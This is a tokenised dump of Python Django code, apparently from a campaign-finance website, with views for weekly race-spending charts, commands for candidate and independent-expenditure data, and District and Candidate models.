'<STR_LIT>' ) <EOL> period_start = week_start - datetime . timedelta ( days = <NUM_LIT> ) <EOL> weeklysummaries = DistrictWeekly . objects . filter ( cycle_week_number = week_number , outside_spending__gte = <NUM_LIT:1000> ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:3> ] <EOL> title = "<STR_LIT>" % ( week_start_formatted , week_end_formatted ) <EOL> previous_week_number = None <EOL> following_week_number = None <EOL> if int ( week_number ) > <NUM_LIT:1> : <EOL> previous_week_number = int ( week_number ) - <NUM_LIT:1> <EOL> if int ( week_number ) < get_week_number ( datetime . date . today ( ) ) : <EOL> following_week_number = int ( week_number ) + <NUM_LIT:1> <EOL> district_ids = weeklysummaries . values ( "<STR_LIT>" ) <EOL> district_id_list = [ str ( x [ '<STR_LIT>' ] ) for x in district_ids ] <EOL> district_list = "<STR_LIT:U+002C>" . join ( district_id_list ) <EOL> data_url = "<STR_LIT>" % ( int ( week_number ) - <NUM_LIT:2> , week_number , district_list ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : period_start , <EOL> '<STR_LIT>' : week_start , <EOL> '<STR_LIT>' : week_end , <EOL> '<STR_LIT>' : weeklysummaries , <EOL> '<STR_LIT>' : previous_week_number , <EOL> '<STR_LIT>' : following_week_number , <EOL> '<STR_LIT>' : week_number , <EOL> '<STR_LIT>' : data_url , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def top_current_races ( request ) : <EOL> week_number = get_week_number ( datetime . date . today ( ) ) - <NUM_LIT:1> <EOL> week_start = get_week_start ( int ( week_number ) ) <EOL> week_start_formatted = week_start . strftime ( '<STR_LIT>' ) <EOL> week_end = get_week_end ( int ( week_number ) ) <EOL> week_end_formatted = week_end . strftime ( '<STR_LIT>' ) <EOL> previous_week_number = int ( week_number ) - <NUM_LIT:1> <EOL> following_week_number = int ( week_number ) + <NUM_LIT:1> <EOL> period_start = week_start - datetime . timedelta ( days = <NUM_LIT> ) <EOL> weeklysummaries = DistrictWeekly . objects . filter ( cycle_week_number = week_number , outside_spending__gt = <NUM_LIT:1000> ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:3> ] <EOL> title = "<STR_LIT>" % ( week_start_formatted , week_end_formatted ) <EOL> district_ids = weeklysummaries . values ( "<STR_LIT>" ) <EOL> district_id_list = [ str ( x [ '<STR_LIT>' ] ) for x in district_ids ] <EOL> district_list = "<STR_LIT:U+002C>" . join ( district_id_list ) <EOL> data_url = "<STR_LIT>" % ( int ( week_number ) - <NUM_LIT:2> , week_number , district_list ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : previous_week_number , <EOL> '<STR_LIT>' : following_week_number , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : period_start , <EOL> '<STR_LIT>' : week_start , <EOL> '<STR_LIT>' : week_end , <EOL> '<STR_LIT>' : weeklysummaries , <EOL> '<STR_LIT>' : week_number , <EOL> '<STR_LIT>' : data_url , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def election_calendar ( request ) : <EOL> title = "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : elections_by_day , <EOL> '<STR_LIT:title>' : title , <EOL> } <EOL> ) <EOL> def chart_test ( request , blog_or_feature ) : <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : blog_or_feature <EOL> } <EOL> ) <EOL> def chart_listing ( request ) : <EOL> chart_list = [ ] <EOL> for key in chart_name_reference : <EOL> value = chart_name_reference [ key ] <EOL> value [ '<STR_LIT>' ] = key <EOL> print value <EOL> chart_list . append ( value ) <EOL> chart_list . sort ( key = lambda x : x [ '<STR_LIT:name>' ] ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : chart_list , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> ) <EOL> def senate_races ( request , blog_or_feature ) : <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : blog_or_feature , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def roi_chart ( request , blog_or_feature ) : <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : blog_or_feature , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def weekly_comparison ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def weekly_comparison_cumulative ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def contrib_comparison ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_donor_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def contrib_comparison_cumulative ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_donor_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) </s>
<s> import json <EOL> from optparse import make_option <EOL> from summary_data . models import District , Candidate_Overlay <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> requires_model_validation = False <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT:state>' , <EOL> help = "<STR_LIT>" ) , <EOL> ) <EOL> def handle ( self , * args , ** options ) : <EOL> state = options [ '<STR_LIT:state>' ] <EOL> assert state , "<STR_LIT>" <EOL> candidate_list = [ ] <EOL> races = District . objects . filter ( state = state , election_year = <NUM_LIT> ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for race in races : <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> for candidate in candidates : <EOL> candidate_list . append ( { "<STR_LIT:id>" : candidate . pk , "<STR_LIT>" : candidate . fec_id , "<STR_LIT>" : candidate . is_incumbent , "<STR_LIT:name>" : candidate . name , "<STR_LIT>" : candidate . party , "<STR_LIT>" : candidate . office , "<STR_LIT>" : candidate . office_district , "<STR_LIT>" : candidate . candidate_status } ) <EOL> print json . dumps ( candidate_list , sort_keys = True , indent = <NUM_LIT:4> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import date <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from django . db . models import Sum <EOL> from django . conf import settings <EOL> from formdata . models import SkedE <EOL> from summary_data . models import Pac_Candidate , Candidate_Overlay , Committee_Overlay <EOL> from shared_utils . cycle_utils import cycle_calendar <EOL> try : <EOL> ACTIVE_CYCLES = settings . ACTIVE_CYCLES <EOL> except : <EOL> print "<STR_LIT>" <EOL> ACTIVE_CYCLES = [ '<STR_LIT>' ] <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> requires_model_validation = False <EOL> def handle ( self , * args , ** options ) : <EOL> for cycle in ACTIVE_CYCLES : <EOL> print "<STR_LIT>" % cycle <EOL> committee_list = Pac_Candidate . objects . filter ( cycle = cycle ) . values ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) . distinct ( ) <EOL> for ie_committee in committee_list : <EOL> fec_id = ie_committee [ '<STR_LIT>' ] <EOL> total_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> dem_support_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:D>' , support_oppose__iexact = '<STR_LIT:S>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> rep_support_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:R>' , support_oppose__iexact = '<STR_LIT:S>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> dem_oppose_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:D>' , support_oppose__iexact = '<STR_LIT:O>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> rep_oppose_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:R>' , support_oppose__iexact = '<STR_LIT:O>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % ( fec_id , total_ies , dem_support_ies , rep_support_ies , dem_oppose_ies , rep_oppose_ies ) <EOL> try : <EOL> this_committee = Committee_Overlay . objects . get ( fec_id = fec_id , cycle = cycle ) <EOL> except Committee_Overlay . DoesNotExist : <EOL> continue <EOL> this_committee . total_indy_expenditures = total_ies <EOL> this_committee . ie_support_dems = dem_support_ies <EOL> this_committee . ie_support_reps = rep_support_ies <EOL> this_committee . ie_oppose_dems = dem_oppose_ies <EOL> this_committee . ie_oppose_reps = rep_oppose_ies <EOL> this_committee . save ( ) </s>
<s> import datetime <EOL> from django . db import models <EOL> from django . utils . text import slugify <EOL> from ftpdata . models import Candidate <EOL> from legislators . models import Legislator <EOL> from api . nulls_last_queryset import NullsLastManager <EOL> from data_references import STATES_FIPS_DICT , STATE_CHOICES_DICT , STATE_CHOICES , ELECTION_TYPE_CHOICES , ELECTION_TYPE_DICT , CANDIDATE_STATUS_CHOICES , CANDIDATE_STATUS_DICT , type_hash_full , type_hash , committee_designation_hash <EOL> class Update_Time ( models . Model ) : <EOL> key = models . SlugField ( max_length = <NUM_LIT:255> ) <EOL> update_time = models . DateTimeField ( ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . update_time = datetime . datetime . today ( ) <EOL> super ( Update_Time , self ) . save ( * args , ** kwargs ) <EOL> class District ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = STATE_CHOICES , help_text = "<STR_LIT>" ) <EOL> incumbent_legislator = models . ForeignKey ( Legislator , null = True ) <EOL> office = models . CharField ( max_length = <NUM_LIT:1> , null = True , <EOL> choices = ( ( '<STR_LIT:H>' , '<STR_LIT>' ) , ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:P>' , '<STR_LIT>' ) ) , help_text = "<STR_LIT>" ) <EOL> office_district = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> term_class = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_pty = models . CharField ( max_length = <NUM_LIT:3> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_party = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> next_election_date = models . DateField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> next_election_code = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = ELECTION_TYPE_CHOICES ) <EOL> special_election_scheduled = models . NullBooleanField ( default = False , null = True , help_text = "<STR_LIT>" ) <EOL> open_seat = models . NullBooleanField ( default = False , null = True , help_text = "<STR_LIT>" ) <EOL> dem_frac_historical = models . FloatField ( null = True , help_text = "<STR_LIT>" ) <EOL> rep_frac_historical = models . FloatField ( null = True , help_text = "<STR_LIT>" ) <EOL> altered_by_2010_redistricting = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> candidate_raised = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> candidate_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> electioneering_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> rothenberg_rating_id = models . IntegerField ( null = True ) <EOL> rothenberg_rating_text = models . CharField ( null = True , max_length = <NUM_LIT> , help_text = "<STR_LIT>" ) <EOL> rothenberg_update_time = models . DateTimeField ( null = True ) <EOL> district_notes = models . TextField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> general_is_decided = models . NullBooleanField ( default = False , null = True , help_text = "<STR_LIT>" ) <EOL> def get_district_fips ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return None <EOL> elif self . office == '<STR_LIT:H>' : <EOL> state_fips = STATES_FIPS_DICT [ self . state ] <EOL> district = self . office_district <EOL> district = district . zfill ( <NUM_LIT:2> ) <EOL> return state_fips + district <EOL> else : <EOL> return None <EOL> def rothenberg_rating_short ( self ) : <EOL> if self . rothenberg_rating_id == <NUM_LIT:9> : <EOL> return '<STR_LIT>' <EOL> elif self . rothenberg_rating_id == <NUM_LIT:5> : <EOL> return '<STR_LIT>' <EOL> return self . rothenberg_rating_text <EOL> def display_map ( self ) : <EOL> if self . office == '<STR_LIT:H>' : <EOL> if self . state not in [ '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> def district_formatted ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return "<STR_LIT>" % ( self . state ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> if self . office_district : <EOL> return "<STR_LIT>" % ( self . state , self . office_district ) <EOL> else : <EOL> return "<STR_LIT:%s>" % ( self . state ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def get_rothenberg_link ( self ) : <EOL> state_slug = STATE_CHOICES_DICT [ self . state ] . lower ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:->' ) <EOL> return "<STR_LIT>" + state_slug <EOL> def __unicode__ ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return "<STR_LIT>" % ( self . cycle , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> if self . office_district : <EOL> return "<STR_LIT>" % ( self . cycle , self . state , self . office_district ) <EOL> else : <EOL> return "<STR_LIT>" % ( self . cycle , self . state ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def get_absolute_url ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> url = "<STR_LIT>" <EOL> return url <EOL> def get_feed_url ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> url = "<STR_LIT>" % ( self . election_year , self . office , self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> url = "<STR_LIT>" % ( self . election_year , self . office , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> url = "<STR_LIT>" % ( self . election_year ) <EOL> return url <EOL> def race_name ( self ) : <EOL> name = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> name = "<STR_LIT>" % ( STATE_CHOICES_DICT [ self . state ] , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> name = "<STR_LIT>" % ( STATE_CHOICES_DICT [ self . state ] ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> name = "<STR_LIT>" <EOL> return name <EOL> def get_filtered_ie_url ( self ) : <EOL> return "<STR_LIT>" % self . pk <EOL> def next_election ( self ) : <EOL> if self . next_election_code : <EOL> return ELECTION_TYPE_DICT [ self . next_election_code ] <EOL> else : <EOL> return "<STR_LIT>" <EOL> class Meta : <EOL> ordering = [ '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Candidate_Overlay ( models . Model ) : <EOL> is_incumbent = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> curated_election_year = models . IntegerField ( null = True , help_text = "<STR_LIT>" ) <EOL> display = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> district = models . ForeignKey ( '<STR_LIT>' , null = True , help_text = "<STR_LIT>" ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> transparency_id = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> is_minor_candidate = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> not_seeking_reelection = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> other_office_sought = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> other_fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> pty = models . CharField ( max_length = <NUM_LIT:3> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> party = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> pcc = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . PositiveIntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> office = models . CharField ( max_length = <NUM_LIT:1> , null = True , <EOL> choices = ( ( '<STR_LIT:H>' , '<STR_LIT>' ) , ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:P>' , '<STR_LIT>' ) ) <EOL> ) <EOL> office_district = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> term_class = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> bio_blurb = models . TextField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> cand_ici = models . CharField ( max_length = <NUM_LIT:1> , null = True , choices = ( ( '<STR_LIT:I>' , '<STR_LIT>' ) , ( '<STR_LIT:C>' , '<STR_LIT>' ) , ( '<STR_LIT:O>' , '<STR_LIT>' ) ) ) <EOL> candidate_status = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = CANDIDATE_STATUS_CHOICES , help_text = "<STR_LIT>" ) <EOL> crp_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True ) <EOL> transparencydata_id = models . CharField ( max_length = <NUM_LIT> , default = '<STR_LIT>' , null = True ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:255> ) <EOL> total_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> expenditures_supporting = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> expenditures_opposing = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> electioneering = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> cand_is_gen_winner = models . NullBooleanField ( null = True , verbose_name = "<STR_LIT>" , help_text = "<STR_LIT>" ) <EOL> is_general_candidate = models . NullBooleanField ( null = True , verbose_name = "<STR_LIT>" , help_text = "<STR_LIT>" ) <EOL> has_contributions = models . NullBooleanField ( null = True , default = False ) <EOL> total_receipts = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_contributions = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_disbursements = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outstanding_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , default = <NUM_LIT:0> ) <EOL> total_unitemized = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> cash_on_hand = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> cash_on_hand_date = models . DateField ( null = True ) <EOL> cand_cand_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , help_text = "<STR_LIT>" ) <EOL> cand_cand_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . name , self . party , self . state , self . cycle ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return '<STR_LIT>' % ( self . name , self . party , self . cycle ) <EOL> else : <EOL> return '<STR_LIT>' % ( self . name , self . party , self . state , self . office_district , self . cycle ) <EOL> def incumbency_status ( self ) : <EOL> if self . is_incumbent : <EOL> return "<STR_LIT:Y>" <EOL> else : <EOL> return "<STR_LIT:N>" <EOL> def is_electronic_filer ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return False <EOL> else : <EOL> return True <EOL> def detailed_office ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . state ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> return '<STR_LIT>' % ( self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return 